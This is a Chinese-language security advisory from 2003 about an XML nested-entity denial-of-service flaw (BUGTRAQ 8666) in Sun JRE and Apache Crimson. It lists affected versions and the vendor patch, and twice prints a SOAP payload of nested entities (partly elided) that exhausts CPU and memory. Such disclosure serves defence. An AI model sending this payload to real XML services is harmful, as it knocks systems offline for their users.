发布日期：2003-09-22
更新日期：2003-09-27

受影响系统：

Sun JRE (Linux Production Release) 1.4.1_03
Sun JRE (Linux Production Release) 1.4.1_02
Sun JRE (Linux Production Release) 1.4.1_01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.4.0_03
Sun JRE (Linux Production Release) 1.4.0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.3.1_06
Sun JRE (Linux Production Release) 1.3.1_05
Sun JRE (Linux Production Release) 1.3.1_03
Sun JRE (Linux Production Release) 1.3.1_02
Sun JRE (Linux Production Release) 1.3.1_01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.3.0_05
Sun JRE (Linux Production Release) 1.3.0_02
Sun JRE (Linux Production Release) 1.3.0
Sun JRE (Linux Production Release) 1.2.2_011
Sun JRE (Linux Production Release) 1.2.2_010
Sun JRE (Linux Production Release) 1.2.2_007
Sun JRE (Linux Production Release) 1.2.2_003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.4.1_03
Sun JRE (Solaris Production Release) 1.4.1_02
Sun JRE (Solaris Production Release) 1.4.1_01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.4.0_03
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.3_05
Sun JRE (Solaris Production Release) 1.3.1_06
Sun JRE (Solaris Production Release) 1.3.1_05
Sun JRE (Solaris Production Release) 1.3.1_03
Sun JRE (Solaris Production Release) 1.3.1_02
Sun JRE (Solaris Production Release) 1.3.1_01
Sun JRE (Solaris Production Release) 1.3.0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_10
Sun JRE (Solaris Production Release) 1.2.2_07
Sun JRE (Solaris Production Release) 1.2.2_05a
Sun JRE (Solaris Production Release) 1.2.1
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.1.8_15
Sun JRE (Solaris Production Release) 1.1.8_14
Sun JRE (Solaris Production Release) 1.1.8_13
Sun JRE (Solaris Production Release) 1.1.8_10
Sun JRE (Solaris Production Release) 1.1.7B
Sun JRE (Windows Production Release) 1.4.1_03
Sun JRE (Windows Production Release) 1.4.1_02
Sun JRE (Windows Production Release) 1.4.1_01
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.0_03
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.3_05
Sun JRE (Windows Production Release) 1.3.1_06
Sun JRE (Windows Production Release) 1.3.1_05
Sun JRE (Windows Production Release) 1.3.1_03
Sun JRE (Windows Production Release) 1.3.1_02
Sun JRE (Windows Production Release) 1.3.1_01a
Sun JRE (Windows Production Release) 1.3.0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.2.2_011
Sun JRE (Windows Production Release) 1.2.2_010
Sun JRE (Windows Production Release) 1.2.2_007
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.1.8_009
Sun JRE (Windows Production Release) 1.1.8_008
Sun JRE (Windows Production Release) 1.1.8_007
Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2_005
    - Debian Linux 2.2
    - Mandrake Linux 7.2
    - RedHat Linux 7.0
    - SuSE Linux 7.0
Sun JRE (Solaris Production Release) 1.1.6
    - Sun Solaris 8.0
    - Sun Solaris 7.0
    - Sun Solaris 2.6

不受影响系统：

Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2
Apache Software Foundation Crimson 1.1

描述：

---

BUGTRAQ  ID: 8666

Sun Java 2 SDK是一款Java实现平台。

Sun Java当处理特殊构建的XML文档时存在问题，远程攻击者利用这个漏洞诱使用户访问恶意XML文档而使系统崩溃。

当XML不允许递归实体定义，而允许嵌套实体定义时，如果XML数据来自外部资源，就有可能产生拒绝服务攻击，如类似如下的SOAP文档包含深层嵌套实体定义，可导致消耗100%CPU时间和消耗大量内存：

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY  x99 "&x100;&x100;"> <!ENTITY  x98 "&x99;&x99;"> ... <!ENTITY   x2 "&x3;&x3;"> <!ENTITY   x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

<*来源：Sun Release Notes
  
  链接：http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

构建如下SOAP文档，诱使用户解析：

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY  x99 "&x100;&x100;"> <!ENTITY  x98 "&x99;&x99;"> ... <!ENTITY   x2 "&x3;&x3;"> <!ENTITY   x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

建议：

---

厂商补丁：

Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载使用Java 2 SDK, Standard Edition：

http://java.sun.com/j2se/1.4.2/relnotes.html

浏览次数：3233
严重程度：0（网友投票）